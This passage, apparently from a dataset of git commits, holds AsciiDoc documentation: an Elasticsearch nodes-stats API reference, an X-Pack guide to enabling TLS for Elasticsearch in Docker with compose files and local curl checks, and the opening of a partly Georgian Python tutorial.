For example:\n\n[horizontal]\n`indices`::\n\tIndices stats about size, document count, indexing and\n\tdeletion times, search times, field cache size, merges and flushes\n\n`fs`::\n\tFile system information, data path, free disk space, read\/write\n\tstats (see <<fs-info,FS information>>)\n\n`http`::\n\tHTTP connection information\n\n`jvm`::\n\tJVM stats, memory pool information, garbage collection, buffer\n\tpools, number of loaded\/unloaded classes\n\n`os`::\n\tOperating system stats, load average, mem, swap\n\t(see <<os-stats,OS statistics>>)\n\n`process`::\n\tProcess statistics, memory consumption, cpu usage, open\n\tfile descriptors (see <<process-stats,Process statistics>>)\n\n`thread_pool`::\n\tStatistics about each thread pool, including current\n\tsize, queue and rejected tasks\n\n`transport`::\n\tTransport statistics about sent and received bytes in\n\tcluster communication\n\n`breaker`::\n\tStatistics about the field data circuit breaker\n\n[source,js]\n--------------------------------------------------\n# return indices and os\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats\/indices,os'\n# return just os and process\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats\/os,process'\n# specific type endpoint\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats\/process'\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/10.0.0.1\/stats\/process'\n--------------------------------------------------\n\nAll stats can be explicitly requested via `\/_nodes\/stats\/_all` or `\/_nodes\/stats?metric=_all`.\n\n[float]\n[[fs-info]]\n==== FS information\n\nThe `fs` flag can be set to retrieve\ninformation that concerns the file system:\n\n`fs.timestamp`::\n\tLast time the file stores statistics have been refreshed\n\n`fs.total.total_in_bytes`::\n\tTotal size (in bytes) of all file stores\n\n`fs.total.free_in_bytes`::\n\tTotal number of unallocated bytes in all file stores\n\n`fs.total.available_in_bytes`::\n\tTotal number of bytes available to this Java virtual machine on all file stores\n\n`fs.data`::\n\tList of all file stores\n\n`fs.data.path`::\n\tPath to the file store\n\n`fs.data.mount`::\n\tMount point of the file store (ex: \/dev\/sda2)\n\n`fs.data.type`::\n\tType of the file store (ex: ext4)\n\n`fs.data.total_in_bytes`::\n\tTotal size (in bytes) of the file store\n\n`fs.data.free_in_bytes`::\n\tTotal number of unallocated bytes in the file store\n\n`fs.data.available_in_bytes`::\n\tTotal number of bytes available to this Java virtual machine on this file store\n\n`fs.data.spins` (Linux only)::\n\tIndicates if the file store is backed by spinning storage.\n\t`null` means we could not determine it, `true` means the device possibly spins\n\t and `false` means it does not (ex: solid-state disks).\n\n[float]\n[[os-stats]]\n==== Operating System statistics\n\nThe `os` flag can be set to retrieve statistics that concern\nthe operating system:\n\n`os.timestamp`::\n\tLast time the operating system statistics have been refreshed\n\n`os.percent`::\n Recent CPU usage for the whole system, or -1 if not supported\n\n`os.load_average`::\n\tSystem load average for the last minute, or -1 if not supported\n\n`os.mem.total_in_bytes`::\n\tTotal amount of physical memory in bytes\n\n`os.mem.free_in_bytes`::\n\tAmount of free physical memory in bytes\n\n`os.mem.free_percent`::\n\tPercentage of free memory\n\n`os.mem.used_in_bytes`::\n\tAmount of used physical memory in bytes\n\n`os.mem.used_percent`::\n\tPercentage of used memory\n\n`os.swap.total_in_bytes`::\n\tTotal amount of swap space in 
bytes\n\n`os.swap.free_in_bytes`::\n\tAmount of free swap space in bytes\n\n`os.swap.used_in_bytes`::\n\tAmount of used swap space in bytes\n\n\n[float]\n[[process-stats]]\n==== Process statistics\n\nThe `process` flag can be set to retrieve statistics that concern\nthe current running process:\n\n`process.timestamp`::\n\tLast time the process statistics have been refreshed\n\n`process.open_file_descriptors`::\n\tNumber of opened file descriptors associated with the current process, or -1 if not supported\n\n`process.max_file_descriptors`::\n\tMaximum number of file descriptors allowed on the system, or -1 if not supported\n\n`process.cpu.percent`::\n\tCPU usage in percent, or -1 if not known at the time the stats are computed\n\n`process.cpu.total_in_millis`::\n\tCPU time (in milliseconds) used by the process on which the Java virtual machine is running, or -1 if not supported\n\n`process.mem.total_virtual_in_bytes`::\n\tSize in bytes of virtual memory that is guaranteed to be available to the running process\n\n\n[float]\n[[field-data]]\n=== Field data statistics\n\nYou can get information about field data memory usage on node\nlevel or on index level.\n\n[source,js]\n--------------------------------------------------\n# Node Stats\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats\/indices\/?fields=field1,field2&pretty'\n\n# Indices Stats\ncurl -XGET 'http:\/\/localhost:9200\/_stats\/fielddata\/?fields=field1,field2&pretty'\n\n# You can use wildcards for field names\ncurl -XGET 'http:\/\/localhost:9200\/_stats\/fielddata\/?fields=field*&pretty'\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats\/indices\/?fields=field*&pretty'\n--------------------------------------------------\n\n[float]\n[[search-groups]]\n=== Search groups\n\nYou can get statistics about search groups for searches executed\non this node.\n\n[source,js]\n--------------------------------------------------\n# All groups with all stats\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats?pretty&groups=_all'\n\n# Some groups from just the indices stats\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats\/indices?pretty&groups=foo,bar'\n--------------------------------------------------\n","old_contents":"[[cluster-nodes-stats]]\n== Nodes Stats\n\n[float]\n=== Nodes statistics\n\nThe cluster nodes stats API allows you to retrieve one or more (or all) of\nthe cluster nodes statistics.\n\n[source,js]\n--------------------------------------------------\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats'\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/nodeId1,nodeId2\/stats'\n--------------------------------------------------\n\nThe first command retrieves stats of all the nodes in the cluster. The\nsecond command selectively retrieves nodes stats of only `nodeId1` and\n`nodeId2`. All the nodes selective options are explained\n<<cluster-nodes,here>>.\n\nBy default, all stats are returned. You can limit this by combining any\nof `indices`, `os`, `process`, `jvm`, `transport`, `http`,\n`fs`, `breaker` and `thread_pool`. 
For example:\n\n[horizontal]\n`indices`::\n\tIndices stats about size, document count, indexing and\n\tdeletion times, search times, field cache size, merges and flushes\n\n`fs`::\n\tFile system information, data path, free disk space, read\/write\n\tstats (see <<fs-info,FS information>>)\n\n`http`::\n\tHTTP connection information\n\n`jvm`::\n\tJVM stats, memory pool information, garbage collection, buffer\n\tpools, number of loaded\/unloaded classes\n\n`os`::\n\tOperating system stats, load average, mem, swap\n\t(see <<os-stats,OS statistics>>)\n\n`process`::\n\tProcess statistics, memory consumption, cpu usage, open\n\tfile descriptors (see <<process-stats,Process statistics>>)\n\n`thread_pool`::\n\tStatistics about each thread pool, including current\n\tsize, queue and rejected tasks\n\n`transport`::\n\tTransport statistics about sent and received bytes in\n\tcluster communication\n\n`breaker`::\n\tStatistics about the field data circuit breaker\n\n[source,js]\n--------------------------------------------------\n# return indices and os\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats\/indices,os'\n# return just os and process\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats\/os,process'\n# specific type endpoint\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats\/process'\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/10.0.0.1\/stats\/process'\n--------------------------------------------------\n\nThe `all` flag can be set to return all the stats.\n\n[float]\n[[fs-info]]\n==== FS information\n\nThe `fs` flag can be set to retrieve\ninformation that concerns the file system:\n\n`fs.timestamp`::\n\tLast time the file stores statistics have been refreshed\n\n`fs.total.total_in_bytes`::\n\tTotal size (in bytes) of all file stores\n\n`fs.total.free_in_bytes`::\n\tTotal number of unallocated bytes in all file stores\n\n`fs.total.available_in_bytes`::\n\tTotal number of bytes available to this Java virtual machine on all file stores\n\n`fs.data`::\n\tList of all file stores\n\n`fs.data.path`::\n\tPath to the file store\n\n`fs.data.mount`::\n\tMount point of the file store (ex: \/dev\/sda2)\n\n`fs.data.type`::\n\tType of the file store (ex: ext4)\n\n`fs.data.total_in_bytes`::\n\tTotal size (in bytes) of the file store\n\n`fs.data.free_in_bytes`::\n\tTotal number of unallocated bytes in the file store\n\n`fs.data.available_in_bytes`::\n\tTotal number of bytes available to this Java virtual machine on this file store\n\n`fs.data.spins` (Linux only)::\n\tIndicates if the file store is backed by spinning storage.\n\t`null` means we could not determine it, `true` means the device possibly spins\n\t and `false` means it does not (ex: solid-state disks).\n\n[float]\n[[os-stats]]\n==== Operating System statistics\n\nThe `os` flag can be set to retrieve statistics that concern\nthe operating system:\n\n`os.timestamp`::\n\tLast time the operating system statistics have been refreshed\n\n`os.percent`::\n Recent CPU usage for the whole system, or -1 if not supported\n\n`os.load_average`::\n\tSystem load average for the last minute, or -1 if not supported\n\n`os.mem.total_in_bytes`::\n\tTotal amount of physical memory in bytes\n\n`os.mem.free_in_bytes`::\n\tAmount of free physical memory in bytes\n\n`os.mem.free_percent`::\n\tPercentage of free memory\n\n`os.mem.used_in_bytes`::\n\tAmount of used physical memory in bytes\n\n`os.mem.used_percent`::\n\tPercentage of used memory\n\n`os.swap.total_in_bytes`::\n\tTotal amount of swap space in bytes\n\n`os.swap.free_in_bytes`::\n\tAmount of free swap space in 
bytes\n\n`os.swap.used_in_bytes`::\n\tAmount of used swap space in bytes\n\n\n[float]\n[[process-stats]]\n==== Process statistics\n\nThe `process` flag can be set to retrieve statistics that concern\nthe current running process:\n\n`process.timestamp`::\n\tLast time the process statistics have been refreshed\n\n`process.open_file_descriptors`::\n\tNumber of opened file descriptors associated with the current process, or -1 if not supported\n\n`process.max_file_descriptors`::\n\tMaximum number of file descriptors allowed on the system, or -1 if not supported\n\n`process.cpu.percent`::\n\tCPU usage in percent, or -1 if not known at the time the stats are computed\n\n`process.cpu.total_in_millis`::\n\tCPU time (in milliseconds) used by the process on which the Java virtual machine is running, or -1 if not supported\n\n`process.mem.total_virtual_in_bytes`::\n\tSize in bytes of virtual memory that is guaranteed to be available to the running process\n\n\n[float]\n[[field-data]]\n=== Field data statistics\n\nYou can get information about field data memory usage on node\nlevel or on index level.\n\n[source,js]\n--------------------------------------------------\n# Node Stats\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats\/indices\/?fields=field1,field2&pretty'\n\n# Indices Stats\ncurl -XGET 'http:\/\/localhost:9200\/_stats\/fielddata\/?fields=field1,field2&pretty'\n\n# You can use wildcards for field names\ncurl -XGET 'http:\/\/localhost:9200\/_stats\/fielddata\/?fields=field*&pretty'\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats\/indices\/?fields=field*&pretty'\n--------------------------------------------------\n\n[float]\n[[search-groups]]\n=== Search groups\n\nYou can get statistics about search groups for searches executed\non this node.\n\n[source,js]\n--------------------------------------------------\n# All groups with all stats\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats?pretty&groups=_all'\n\n# Some groups from just the indices stats\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats\/indices?pretty&groups=foo,bar'\n--------------------------------------------------\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8c83fe8c857dd6efb1b5635144d7dad52ba23711","subject":"[DOCS] Fix wrapped lines in code blocks of TLS getting started guide","message":"[DOCS] Fix wrapped lines in code blocks of TLS getting started guide\n\nRelates elastic\/x-pack-elasticsearch#2970\n\nOriginal commit: elastic\/x-pack-elasticsearch@a9de6fcdfb1c6aba63203ebaccd13de7b9134157\n","repos":"vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elassandra,vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra","old_file":"docs\/en\/security\/securing-communications\/configuring-tls-docker.asciidoc","new_file":"docs\/en\/security\/securing-communications\/configuring-tls-docker.asciidoc","new_contents":"[role=\"xpack\"]\n[[configuring-tls-docker]]\n=== Encrypting Communications in an {es} Docker Image\n\nStarting with version 6.0.0, {security} (Gold, Platinum or Enterprise subscriptions) https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/6.0\/breaking-6.0.0-xes.html[requires SSL\/TLS]\nencryption for the transport networking layer.\n\nThis section demonstrates an easy path to get started with SSL\/TLS for both\nHTTPS and transport using the `elasticsearch-platinum` docker image.\n\nFor further details, please refer to\n{xpack-ref}\/encrypting-communications.html[Encrypting Communications] 
and\nhttps:\/\/www.elastic.co\/subscriptions[available subscriptions].\n\n[float]\n==== Prepare the environment\n\n<<docker,Install {es} with Docker>>. \n\nInside a new, empty directory, create the following **four files**:\n\n`instances.yml`:\n[\"source\",\"yaml\"]\n----\ninstances:\n - name: es01\n dns:\n - es01 <1>\n - localhost\n ip:\n - 127.0.0.1\n - name: es02\n dns:\n - es02\n - localhost\n ip:\n - 127.0.0.1\n----\n<1> Allow use of embedded Docker DNS server names.\n\n`.env`:\n[source,yaml]\n----\nCERTS_DIR=\/usr\/share\/elasticsearch\/config\/x-pack\/certificates <1>\nELASTIC_PASSWORD=PleaseChangeMe <2>\n----\n<1> The path, inside the Docker image, where certificates are expected to be found.\n<2> Initial password for the `elastic` user.\n\n[[getting-starter-tls-create-certs-composefile]]\n`create-certs.yml`:\nifeval::[\"{release-state}\"==\"unreleased\"]\n\nWARNING: Version {version} of {es} has not yet been released, so a\n`create-certs.yml` is not available for this version.\n\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n[\"source\",\"yaml\",subs=\"attributes\"]\n----\nversion: '2.2'\nservices:\n create_certs:\n container_name: create_certs\n image: docker.elastic.co\/elasticsearch\/elasticsearch-platinum:{version}\n command: >\n bash -c '\n if [[ ! -d config\/x-pack\/certificates\/certs ]]; then\n mkdir config\/x-pack\/certificates\/certs;\n fi;\n if [[ ! -f \/local\/certs\/bundle.zip ]]; then\n bin\/x-pack\/certgen --silent --in config\/x-pack\/certificates\/instances.yml --out config\/x-pack\/certificates\/certs\/bundle.zip;\n unzip config\/x-pack\/certificates\/certs\/bundle.zip -d config\/x-pack\/certificates\/certs; <1>\n fi;\n chgrp -R 0 config\/x-pack\/certificates\/certs\n '\n user: $\\{UID:-1000\\}\n working_dir: \/usr\/share\/elasticsearch\n volumes: ['.:\/usr\/share\/elasticsearch\/config\/x-pack\/certificates']\n----\n\n<1> The new node certificates and CA certificate+key are placed under the local directory `certs`.\nendif::[]\n\n[[getting-starter-tls-create-docker-compose]]\n`docker-compose.yml`:\nifeval::[\"{release-state}\"==\"unreleased\"]\n\nWARNING: Version {version} of {es} has not yet been released, so a\n`docker-compose.yml` is not available for this version.\n\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n[\"source\",\"yaml\",subs=\"attributes\"]\n----\nversion: '2.2'\nservices:\n es01:\n container_name: es01\n image: docker.elastic.co\/elasticsearch\/elasticsearch-platinum:{version}\n environment:\n - node.name=es01\n - discovery.zen.minimum_master_nodes=2\n - ELASTIC_PASSWORD=$ELASTIC_PASSWORD <1>\n - \"ES_JAVA_OPTS=-Xms512m -Xmx512m\"\n - xpack.security.http.ssl.enabled=true\n - xpack.security.transport.ssl.enabled=true\n - xpack.security.transport.ssl.verification_mode=certificate <2>\n - xpack.ssl.certificate_authorities=$CERTS_DIR\/ca\/ca.crt\n - xpack.ssl.certificate=$CERTS_DIR\/es01\/es01.crt\n - xpack.ssl.key=$CERTS_DIR\/es01\/es01.key\n volumes: ['esdata_01:\/usr\/share\/elasticsearch\/data', '.\/certs:$CERTS_DIR']\n ports:\n - 9200:9200\n healthcheck:\n test: curl --cacert $CERTS_DIR\/ca\/ca.crt -s https:\/\/localhost:9200 >\/dev\/null; if [[ $$? 
== 52 ]]; then echo 0; else echo 1; fi\n interval: 30s\n timeout: 10s\n retries: 5\n es02:\n container_name: es02\n image: docker.elastic.co\/elasticsearch\/elasticsearch-platinum:{version}\n environment:\n - node.name=es02\n - discovery.zen.minimum_master_nodes=2\n - ELASTIC_PASSWORD=$ELASTIC_PASSWORD\n - discovery.zen.ping.unicast.hosts=es01\n - \"ES_JAVA_OPTS=-Xms512m -Xmx512m\"\n - xpack.security.http.ssl.enabled=true\n - xpack.security.transport.ssl.enabled=true\n - xpack.security.transport.ssl.verification_mode=certificate\n - xpack.ssl.certificate_authorities=$CERTS_DIR\/ca\/ca.crt\n - xpack.ssl.certificate=$CERTS_DIR\/es02\/es02.crt\n - xpack.ssl.key=$CERTS_DIR\/es02\/es02.key\n volumes: ['esdata_02:\/usr\/share\/elasticsearch\/data', '.\/certs:$CERTS_DIR']\n wait_until_ready:\n image: docker.elastic.co\/elasticsearch\/elasticsearch-platinum:{version}\n command: \/usr\/bin\/true\n depends_on: {\"es01\": {\"condition\": \"service_healthy\"}}\nvolumes: {\"esdata_01\": {\"driver\": \"local\"}, \"esdata_02\": {\"driver\": \"local\"}}\n----\n\n<1> Bootstrap `elastic` with the password defined in `.env`. See {xpack-ref}\/setting-up-authentication.html#bootstrap-elastic-passwords[the Elastic Bootstrap Password].\n<2> Disable verification of authenticity for inter-node communication. Allows\ncreating self-signed certificates without having to pin specific internal IP addresses.\nendif::[]\n\n[float]\n==== Run the example\n. Generate the certificates (only needed once):\n+\n--\n[\"source\",\"sh\"]\n----\ndocker-compose -f create-certs.yml up\n----\n--\n. Start two {es} nodes configured for SSL\/TLS:\n+\n--\n[\"source\",\"sh\"]\n----\ndocker-compose up -d\n----\n--\n. Access the {es} API over SSL\/TLS using the bootstrapped password:\n+\n--\n[\"source\",\"sh\"]\n----\ncurl --cacert certs\/ca\/ca.crt -u elastic:PleaseChangeMe https:\/\/localhost:9200\n----\n\/\/ NOTCONSOLE\n--\n. The `setup-passwords` tool can also be used to generate random passwords for\nall users:\n+\n--\n[\"source\",\"sh\"]\n----\ndocker exec es01 \/bin\/bash -c \"bin\/x-pack\/setup-passwords auto --batch -Expack.ssl.certificate=x-pack\/certificates\/es01\/es01.crt -Expack.ssl.certificate_authorities=x-pack\/certificates\/ca\/ca.crt -Expack.ssl.key=x-pack\/certificates\/es01\/es01.key --url https:\/\/localhost:9200\"\n----\n--\n","old_contents":"[role=\"xpack\"]\n[[configuring-tls-docker]]\n=== Encrypting Communications in an {es} Docker Image\n\nStarting with version 6.0.0, {security} (Gold, Platinum or Enterprise subscriptions) https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/6.0\/breaking-6.0.0-xes.html[requires SSL\/TLS]\nencryption for the transport networking layer.\n\nThis section demonstrates an easy path to get started with SSL\/TLS for both\nHTTPS and transport using the `elasticsearch-platinum` docker image.\n\nFor further details, please refer to\n{xpack-ref}\/encrypting-communications.html[Encrypting Communications] and\nhttps:\/\/www.elastic.co\/subscriptions[available subscriptions].\n\n[float]\n==== Prepare the environment\n\n<<docker,Install {es} with Docker>>. 
\n\nInside a new, empty directory, create the following **four files**:\n\n`instances.yml`:\n[\"source\",\"yaml\"]\n----\ninstances:\n - name: es01\n dns:\n - es01 <1>\n - localhost\n ip:\n - 127.0.0.1\n - name: es02\n dns:\n - es02\n - localhost\n ip:\n - 127.0.0.1\n----\n<1> Allow use of embedded Docker DNS server names.\n\n`.env`:\n[source,yaml]\n----\nCERTS_DIR=\/usr\/share\/elasticsearch\/config\/x-pack\/certificates <1>\nELASTIC_PASSWORD=PleaseChangeMe <2>\n----\n<1> The path, inside the Docker image, where certificates are expected to be found.\n<2> Initial password for the `elastic` user.\n\n[[getting-starter-tls-create-certs-composefile]]\n`create-certs.yml`:\nifeval::[\"{release-state}\"==\"unreleased\"]\n\nWARNING: Version {version} of {es} has not yet been released, so a\n`create-certs.yml` is not available for this version.\n\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n[\"source\",\"yaml\",subs=\"attributes\"]\n----\nversion: '2.2'\nservices:\n create_certs:\n container_name: create_certs\n image: docker.elastic.co\/elasticsearch\/elasticsearch-platinum:{version}\n command: >\n bash -c '\n if [[ ! -d config\/x-pack\/certificates\/certs ]]; then\n mkdir config\/x-pack\/certificates\/certs;\n fi;\n if [[ ! -f \/local\/certs\/bundle.zip ]]; then\n bin\/x-pack\/certgen --silent --in config\/x-pack\/certificates\/instances.yml --out config\/x-pack\/certificates\/certs\/bundle.zip;\n unzip config\/x-pack\/certificates\/certs\/bundle.zip -d config\/x-pack\/certificates\/certs; <1>\n fi;\n chgrp -R 0 config\/x-pack\/certificates\/certs\n '\n user: $\\{UID:-1000\\}\n working_dir: \/usr\/share\/elasticsearch\n volumes: ['.:\/usr\/share\/elasticsearch\/config\/x-pack\/certificates']\n----\n\n<1> The new node certificates and CA certificate+key are placed under the local directory `certs`.\nendif::[]\n\n[[getting-starter-tls-create-docker-compose]]\n`docker-compose.yml`:\nifeval::[\"{release-state}\"==\"unreleased\"]\n\nWARNING: Version {version} of {es} has not yet been released, so a\n`docker-compose.yml` is not available for this version.\n\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n[\"source\",\"yaml\",subs=\"attributes\"]\n----\nversion: '2.2'\nservices:\n es01:\n container_name: es01\n image: docker.elastic.co\/elasticsearch\/elasticsearch-platinum:{version}\n environment:\n - node.name=es01\n - discovery.zen.minimum_master_nodes=2\n - ELASTIC_PASSWORD=$ELASTIC_PASSWORD <1>\n - \"ES_JAVA_OPTS=-Xms512m -Xmx512m\"\n - xpack.security.http.ssl.enabled=true\n - xpack.security.transport.ssl.enabled=true\n - xpack.security.transport.ssl.verification_mode=certificate <2>\n - xpack.ssl.certificate_authorities=$CERTS_DIR\/ca\/ca.crt\n - xpack.ssl.certificate=$CERTS_DIR\/es01\/es01.crt\n - xpack.ssl.key=$CERTS_DIR\/es01\/es01.key\n volumes: ['esdata_01:\/usr\/share\/elasticsearch\/data', '.\/certs:$CERTS_DIR']\n ports:\n - 9200:9200\n healthcheck:\n test: curl --cacert $CERTS_DIR\/ca\/ca.crt -s https:\/\/localhost:9200 >\/dev\/null; if [[ $$? 
== 52 ]]; then echo 0; else echo 1; fi\n interval: 30s\n timeout: 10s\n retries: 5\n es02:\n container_name: es02\n image: docker.elastic.co\/elasticsearch\/elasticsearch-platinum:{version}\n environment:\n - node.name=es02\n - discovery.zen.minimum_master_nodes=2\n - ELASTIC_PASSWORD=$ELASTIC_PASSWORD\n - discovery.zen.ping.unicast.hosts=es01\n - \"ES_JAVA_OPTS=-Xms512m -Xmx512m\"\n - xpack.security.http.ssl.enabled=true\n - xpack.security.transport.ssl.enabled=true\n - xpack.security.transport.ssl.verification_mode=certificate\n - xpack.ssl.certificate_authorities=$CERTS_DIR\/ca\/ca.crt\n - xpack.ssl.certificate=$CERTS_DIR\/es02\/es02.crt\n - xpack.ssl.key=$CERTS_DIR\/es02\/es02.key\n volumes: ['esdata_02:\/usr\/share\/elasticsearch\/data', '.\/certs:$CERTS_DIR']\n wait_until_ready:\n image: docker.elastic.co\/elasticsearch\/elasticsearch-platinum:{version}\n command: \/usr\/bin\/true\n depends_on: {\"es01\": {\"condition\": \"service_healthy\"}}\nvolumes: {\"esdata_01\": {\"driver\": \"local\"}, \"esdata_02\": {\"driver\": \"local\"}}\n----\n\n<1> Bootstrap `elastic` with the password defined in `.env`. See {xpack-ref}\/setting-up-authentication.html#bootstrap-elastic-passwords[the Elastic Bootstrap Password].\n<2> Disable verification of authenticity for inter-node communication. Allows\ncreating self-signed certificates without having to pin specific internal IP addresses.\nendif::[]\n\n[float]\n==== Run the example\n. Generate the certificates (only needed once):\n+\n--\n[\"source\",\"sh\"]\n----\ndocker-compose -f create-certs.yml up\n----\n--\n. Start two {es} nodes configured for SSL\/TLS:\n+\n--\n[\"source\",\"sh\"]\n----\ndocker-compose up -d\n----\n--\n. Access the {es} API over SSL\/TLS using the bootstrapped password:\n+\n--\n[\"source\",\"sh\"]\n----\ncurl --cacert certs\/ca\/ca.crt -u elastic:PleaseChangeMe\nhttps:\/\/localhost:9200\n----\n\/\/ NOTCONSOLE\n--\n. The `setup-passwords` tool can also be used to generate random passwords for\nall users:\n+\n--\n[\"source\",\"sh\"]\n----\ndocker exec es01 \/bin\/bash -c \"bin\/x-pack\/setup-passwords auto --batch\n-Expack.ssl.certificate=x-pack\/certificates\/es01\/es01.crt\n-Expack.ssl.certificate_authorities=x-pack\/certificates\/ca\/ca.crt\n-Expack.ssl.key=x-pack\/certificates\/es01\/es01.key\n--url https:\/\/localhost:9200\"\n----\n--\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ea769e68773060b2d2e0719917aa476f7ed6af63","subject":"Update 2016-01-24-the-python-tutorial-part-1.adoc","message":"Update 2016-01-24-the-python-tutorial-part-1.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-24-the-python-tutorial-part-1.adoc","new_file":"_posts\/2016-01-24-the-python-tutorial-part-1.adoc","new_contents":"= The Python Tutorial - Part 1\n:hp-alt-title: the python tutorial - part 1\n\nPython is an easy-to-learn, powerful programming language. 
\u10db\u10d0\u10e1 \u10d0\u10e5\u10d5\u10e1 \u10d4\u10e4\u10d4\u10e5\u10e2\u10e3\u10e0\u10d8 \u10db\u10d0\u10e6\u10d0\u10da\u10d8 \u10d3\u10dd\u10dc\u10d8\u10e1 \u10db\u10dd\u10dc\u10d0\u10ea\u10d4\u10db\u10d7\u10d0 \u10e1\u10e2\u10e0\u10e3\u10e5\u10e2\u10e3\u10e0\u10d4\u10d1\u10d8 \u10d3\u10d0 \u10db\u10d0\u10e0\u10e2\u10d8\u10d5\u10d8, \u10db\u10d0\u10d2\u10e0\u10d0\u10db \u10d4\u10e4\u10d4\u10e5\u10e2\u10e3\u10e0\u10d8 \u10db\u10d8\u10d3\u10d2\u10dd\u10db\u10d0 \u10dd\u10d1\u10d8\u10d4\u10e5\u10e2\u10d6\u10d4 \u10dd\u10e0\u10d8\u10d4\u10dc\u10e2\u10d8\u10e0\u10d4\u10d1\u10e3\u10da\u10d8 \u10de\u10e0\u10dd\u10d2\u10e0\u10d0\u10db\u10d8\u10e0\u10d4\u10d1\u10d8\u10e1(OOP). \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d4\u10da\u10d4\u10d2\u10d0\u10dc\u10e2\u10e3\u10e0\u10d8 \u10e1\u10d8\u10dc\u10e2\u10d0\u10e5\u10e1\u10d8 \u10d3\u10d0 \u10d3\u10d8\u10dc\u10d0\u10db\u10d8\u10e3\u10e0\u10dd\u10d1\u10d0\u10e1\u10d7\u10d0\u10dc \u10d4\u10e0\u10d7\u10d0\u10d3 \u10d8\u10dc\u10e2\u10d4\u10e0\u10de\u10e0\u10d4\u10e2\u10d8\u10e0\u10d4\u10d1\u10e3\u10da\u10d8 \u10d2\u10d0\u10e0\u10d4\u10db\u10dd, \u10e5\u10db\u10dc\u10d8\u10e1 \u10d8\u10d3\u10d4\u10d0\u10da\u10e3\u10e0 \u10d4\u10dc\u10d0\u10e1 \u10e1\u10d9\u10e0\u10d8\u10de\u10e2\u10d8\u10dc\u10d2\u10d8\u10e1\u10d7\u10d5\u10d8\u10e1(scripting) \u10d3\u10d0 \u10e1\u10ec\u10e0\u10d0\u10e4\u10d8 application development-\u10d7\u10d5\u10d8\u10e1 \u10d1\u10d4\u10d5\u10e0 \u10e1\u10e4\u10d4\u10e0\u10dd\u10e8\u10d8 \u10e1\u10d0\u10e3\u10d9\u10d4\u10d7\u10d4\u10e1\u10dd \u10de\u10da\u10d0\u10e2\u10e4\u10dd\u10e0\u10db\u10d4\u10d1\u10d6\u10d4.\n\n\u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10de\u10e0\u10d4\u10e2\u10d0\u10e2\u10dd\u10e0\u10d8 \u10d3\u10d0 \u10db\u10d7\u10da\u10d8\u10d0\u10dc\u10d8 \u10e1\u10e2\u10d0\u10dc\u10d3\u10d0\u10e0\u10e2\u10e3\u10da\u10d8 \u10d1\u10d8\u10d1\u10da\u10d8\u10dd\u10d7\u10d4\u10d9\u10d0 \u10d7\u10d0\u10d5\u10d8\u10e1\u10e3\u10e4\u10da\u10d0\u10d3 \u10ee\u10d4\u10da\u10db\u10d8\u10e1\u10d0\u10ec\u10d5\u10d3\u10dd\u10db\u10d8\u10d0 \u10e0\u10dd\u10d2\u10dd\u10e0\u10ea \u10d9\u10dd\u10d3\u10d8\u10e1 \u10ec\u10e7\u10d0\u10e0\u10dd\u10e1(Source) \u10d0\u10e1\u10d4\u10d5\u10d4 \u10d1\u10d8\u10dc\u10d0\u10e0\u10e3\u10da\u10d8(Binary) \u10e4\u10dd\u10e0\u10db\u10d8\u10d7 \u10e7\u10d5\u10d4\u10da\u10d0 \u10eb\u10d8\u10e0\u10d8\u10d7\u10d0\u10d3 \u10de\u10da\u10d0\u10e2\u10e4\u10dd\u10e0\u10db\u10d0\u10d6\u10d4 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10dd\u10e4\u10d8\u10ea\u10d8\u10d0\u10da\u10e3\u10e0\u10d8 \u10d5\u10d4\u10d1 \u10e1\u10d0\u10d8\u10e2\u10d8\u10d3\u10d0\u10dc https:\/\/www.python.org \u10d3\u10d0 \u10e8\u10d4\u10d8\u10eb\u10da\u10d4\u10d1\u10d0 \u10d7\u10d0\u10d5\u10d8\u10e1\u10e3\u10e4\u10da\u10d0\u10d3 \u10d2\u10d0\u10d5\u10e0\u10ea\u10d4\u10da\u10d4\u10d1\u10d0. 
